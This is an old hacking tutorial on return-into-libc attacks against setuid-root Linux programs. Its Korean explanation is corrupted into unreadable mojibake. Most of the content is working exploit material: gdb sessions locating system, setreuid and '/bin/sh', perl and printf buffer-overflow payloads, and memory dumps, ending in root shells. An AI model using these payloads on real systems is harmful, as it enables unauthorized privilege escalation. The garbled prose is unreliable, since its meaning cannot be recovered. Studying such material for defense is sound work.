================================================== OMEGA Project setuid 2002/ 09/ 17 hackerleon in Null@Root leon@null2root.org ================================================== 0x0 OMEGA ---------------- OMEGA Project ڵ带 ų Ư ڵ带 ŷο ȯ濡 α׷ Ͽ ȹ ִ ̴. ϰ ý ̺귯 ϵǾ α׷ Ǵ ε system() Լ ġ ã 츮 ϴ ޸𸮰(RET) system() Լ ġ Ѵٸ 츮 ڵ ۼ ڵ ġ ˾Ƴ δ Ѽ ذ ְ Ǿ. 0x01 getuid Linux kernel 2.4.x ̻󿡼 α׷ ϱ setuid α׷ ʿ ־ ش α׷ Ǵ ͷƮ Ǿ ٸ α׷ Ϸ Ҷ getuid Ͽ ϴ user shell uid ͼ α׷ ϰ ִ. ̿ ڵ带 ̿Ͽ ÿ ϰ setreuid ڵ带 ڵ տ ν ذɼ , ڵ带 ̿ ʴ race condition̳ ȯ溯 ༺ α׷ ĩŸ ذ ̶ ְڴ. ï OMEGA ̿Ͽ α׷ Ҷ ̿ ߻Ѵ. //test1.c main(int argc, char *argv[]) { char buf[16]; if(argc > 1) strcpy(buf,argv[1]); } $ls -l test1 -rwsr-xr-x 1 root root 14491 Sep 17 11:49 test1 $id uid=500(leon) gid=500(leon) α׷ OMEGA Ͽ kernel 2.4.x ̻󿡼 Ͽ Ѵ. $ gdb test1 (gdb) b main Breakpoint 1 at 0x8048466 (gdb) r Starting program: /home/leon/study/test1 Breakpoint 1, 0x08048466 in main () (gdb) x/x $ebp 0xbffffb08: 0xbffffb48 (gdb) x/x system 0x4006c584 <__libc_system>: 0x57e58955 (gdb) x/s system+908184 0x4014a120 <__clz_tab+2155>: "/bin/sh" <----------- lamagra exploit "/bin/sh" ã $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\x84\xc5\x06\x40\x41\x41\x41\x41\x20\xa1\x14\x40"' sh-2.05$ id uid=500(leon) gid=500(leon) Ǿ ༺ Ͽ RET system() ߰ "/bin/sh" Ͽ, getuid Ͽ ڽ ִ. 0x02 setuid ------------------- α׷ 帧 RETġ system() Լ call +4byte ġ ťƮ ڷ ϴ° ִ. ï α׷ ǰ ִ°̴. ׷ٸ RET system() callϱ setuid callѴٸ  ɱ?.. غ [buf][ebp][*setreuid][*system][UID][*/bin/sh] غѴ. $gdb (gdb) b main Breakpoint 1 at 0x80486d6 (gdb) r Starting program: /home/leon/study/test1 Breakpoint 1, 0x080486d6 in main () (gdb) x/x system 0x4006c584 <__libc_system>: 0x57e58955 (gdb) x/x setreuid 0x40103db4 <__setreuid>: 0x56e58955 (gdb) $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\xb4\x3d\x10\x40\x84\xc5\x06\x40\x01\x01\x01\x01\x20\xa1\x14\x40"' sh-2.05$ id uid=16843009 gid=500(leon) 16 0x01010101 = > dec : 16843009 uid Ȱ ִ... ׷ 츮 uid=0 ؼ ش 16 0x00000000 ־ Ѵٴ Ȱִ°̴. $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\xb4\x3d\x10\x40\x84\xc5\x06\x40\x00\x00\x00\x00\x20\xa1\x14\x40"' sagmentation fault ش α׷ Է "strcpy" Լ Է¹޴° ִµ ̶, Ʈ 0x00 ϰ Ʈ ͹̳ Ǵ° ˼ִ.(stack guard ) , strcpy Ͽ Է¹޴ 츮 츮 ϴ "uid=0" ȹ Ѵٴ° ˼ ִ. 0x03 ԷԼ ---------------------- //test2.c main() { char buf[16]; scanf("%s",buf); } $ls -l test2 -rwsr-xr-x 1 root root 11391 Sep 17 11:51 test2 ! ̹ strcpy ƴ scanf() Լ  ɱ? غ !..̰ ̺귯 "/bin/sh" ġ "0x4014a120" ϴµ "0x20" ͹̳ Ǵ ʿ "/bin/sh" ־ Ͽ. [buf][ebp][*setreuid][*system][0x00][*/bin/sh][junk][/bin/sh] $ (printf "AAAAAAAAAAAAAAAAAAAA\xb4\x3d\x10\x40\x84\xc5\x06\x40\x00\x00\x00\x00\x10\xfb\xff\xbf\x41\x41\x41\x41/bin/sh";cat)|./test2 0xbffffae8 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0xbffffaf8 41 41 41 41 b4 3d 10 40 84 c5 06 40 00 00 00 00 AAAA.=.@...@.... 0xbffffb08 10 fb ff bf 41 41 41 41 2f 62 69 6e 2f 73 68 00 ....AAAA/bin/sh. id uid=0(root) gid=0(root) uid=0 ȹϿ.. scanf Լǰ Null ڸ ־, uid=0 ȹ ϴ. setuid=0 ƴ α׷ setreuid(UID,UID) ־ ϹǷ "/bin/sh" ġ ϴ ġ ѹ UID ־ Ѵ. ̰ /bin/sh Ҽ Ƿ ũ ȹ Ͽ Ѵ. ׽Ʈ Ʈ Է ޴° Nullڸ ԷҼ ְ ̰ 츮 ϴ setuid ȹҼ ִٴ ִ. ׷ strcpy Էµ ڸ ٽ copyؿ setuid ȹ Ҽ ......BUT ~~~~ ^^ 0x04 uid=0 ʸ ҷָ!!! --------------------------- ׷ ׷ٰ ϸ Ŀ ƴϴ... ...test1 ޸𸮸 Ͽ 캸 Ѵ.. //test1.c #include "dumpcode.h" main(int argc, char *argv[]) { char buf[16]; if(argc > 1) strcpy(buf,argv[1]); dumpcode(buf,64); } $./test1 AAAA 0xbffffae8 41 41 41 41 00 84 04 08 94 97 04 08 9c 98 04 08 AAAA............ 0xbffffaf8 38 fb ff bf 07 95 03 40 02 00 00 00 64 fb ff bf 8......@....d... 0xbffffb08 70 fb ff bf 42 83 04 08 40 87 04 08 00 00 00 00 p...B...@....... 0xbffffb18 38 fb ff bf f1 94 03 40 00 00 00 00 70 fb ff bf 8......@....p... Ǯ  Ժ....и RETĿ 00 00 00 00 δ.. ̰ α׷ Ÿ ͷƮε ̳ ̿غ 츮 ϴ uid=0 ȹ ?...^^ !!!.. .. 츮 system ȣϱ setreuid ȣѰ Ѵ.., α׷ ....ȴٴ° ˼ ִ... 00 00 00 00 ִ° .. ̺귯 Լ call 00 00 00 00 ڷ  ġ setreuid system ȣϸ ɵɱ?.. 츮 ⼭ Ż printf ȣϱ Ѵ.. $ gdb test1 (gdb) b main Breakpoint 1 at 0x80486d6 (gdb) r Starting program: /home/leon/study/test1 /bin/bash: /root/.bashrc: Permission denied Breakpoint 1, 0x080486d6 in main () (gdb) x/x system 0x4006c584 <__libc_system>: 0x57e58955 (gdb) x/x setreuid 0x40103db4 <__setreuid>: 0x56e58955 (gdb) x/x printf 0x4007cd04 : 0x53e58955 (gdb) ... ù° 00 00 00 00 ... $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\xb4\x3d\x10\x40\x84\xc5\x06\x40"' 0xbffffac8 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0xbffffad8 41 41 41 41 04 cd 07 40 04 cd 07 40 04 cd 07 40 AAAA...@...@...@ 0xbffffae8 04 cd 07 40 b4 3d 10 40 84 c5 06 40 00 00 00 00 ...@.=.@...@.... 0xbffffaf8 18 fb ff bf f1 94 03 40 00 00 00 00 50 fb ff bf .......@....P... $ ... ȵǴ±... ֱ׷ ߿ ... ̹ ι° 00 00 00 00 $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\xb4\x3d\x10\x40\x84\xc5\x06\x40"' 0xbffffab8 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0xbffffac8 41 41 41 41 04 cd 07 40 04 cd 07 40 04 cd 07 40 AAAA...@...@...@ 0xbffffad8 04 cd 07 40 04 cd 07 40 04 cd 07 40 04 cd 07 40 ...@...@...@...@ 0xbffffae8 b4 3d 10 40 84 c5 06 40 00 00 00 00 40 fb ff bf .=.@...@....@... sh: ?E??E :command not found ƽ!!! Ǿ... ׷ ũ .. 켱 PATH ߰ $ PATH=$PATH:./ $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\xb4\x3d\x10\x40\x84\xc5\x06\x40"' 2> file $ ./lnk file <---------- lnk lamagra Ŀ α׷̴. filename = j??????? $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\xb4\x3d\x10\x40\x84\xc5\x06\x40"' # id uid=0(root) gid=500(leon) Ǿ...^^ RET ° 00 00 00 00 ִ Ȯ ˼ .. [buf][ebp][printf1][printf2][printf...][setreuid][system] uid=0 ȹ ִ. Ǿ OMEGA ̿ؼ getuid ý Ͽ setuid ȹ ִٴ ɼ ˾ƺҴ.. ׷..... Ȥ.. Ʋ ֽðų leon@null2root.org ּ.. _eof